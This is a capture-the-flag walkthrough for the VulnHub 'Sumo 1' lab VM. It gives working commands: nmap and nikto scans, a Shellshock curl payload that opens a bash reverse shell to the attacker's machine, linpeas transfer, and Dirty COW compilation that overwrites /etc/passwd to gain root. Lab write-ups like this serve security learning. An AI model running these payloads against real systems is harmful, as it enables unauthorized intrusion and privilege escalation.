https://www.vulnhub.com/entry/sumo-1,480/

System Info

  • Ubuntu 12.04 LTS

Discover Target Network

  • sudo nmap -sn 192.168.122.0-255
  • nmap -p- 192.168.122.113

Port 80

  • not much to see on the website, other than it is running apache 2.2.22

ShellShock

https://www.sevenlayers.com/index.php/125-exploiting-shellshock

  • use nikto -host 192.168.122.113 to scan for webserver vulnerabilities.

  • it shows that/cgi-bin/test, /cgi-bin/test.sh, /cgi-bin/test/test.cgi is vulnerable to Shellshock vulnerability

  • running:

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.122.101/7741 0>&1' http://192.168.122.113/cgi-bin/test/test.cgi

to open a revese shell on port 7741 to host using TCP

  • upgrade to a better shell using python2 python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

  • we are a very low privileged user, and not much misconfiguration to see.
  • we can try running enumeration scripts like linpeas.sh, but target machine doesn’t have cURL.
  • download it onto host machine by wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
  • open a simple http server using python3 python -m http.server 9999
  • cd /tmp on target machine, wget http://192.168.122.101:9999/linpeas.sh && chmod +x linpeas.sh

Dirty COW

  • running it will show us this kernel 3.2.0 is vulnerable to multiple exploit, the CVE we going to exploit is CVE-2016-5195, which allows local users to gain privileges by incorrect handling of a Copy-On-Write feature to write to a read only memory, name “Dirty COW”.
  • the exploit we are going to use is https://github.com/firefart/dirtycow
  • get it onto the host machine by wget https://github.com/firefart/dirtycow/raw/master/dirty.c
  • it has to need to be cross-complied for target system or compile on the target system.
  • so get it onto the target machine using the same way as linpeas.sh
  • But if we try to compile using GNU C compiler on target system, we will get an error like:
Gcc error: gcc: error trying to exec 'cc1': execvp: No such file or directory
  • locate cc1 by find / -name cc1 2> /dev/null
  • add it to enviornmental variable by export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/4.6/cc1
  • now we can compile it using gcc -pthread dirty.c -O2 -o dirty -lcrypt
  • running it will prompt us for a new password for new user, enter anything.
  • now we can SSH into the machine again with ssh firefart@192.168.122.113
  • eventhough our username is firefart, if we run id, it shows that we are root!

Capture the Flag

  • cat /root/root.txt

Cleaning Up

  • Because it replaced target system’s /etc/passwd file, to clean up we need to restore it by mv /tmp/passwd.bak /etc/passwd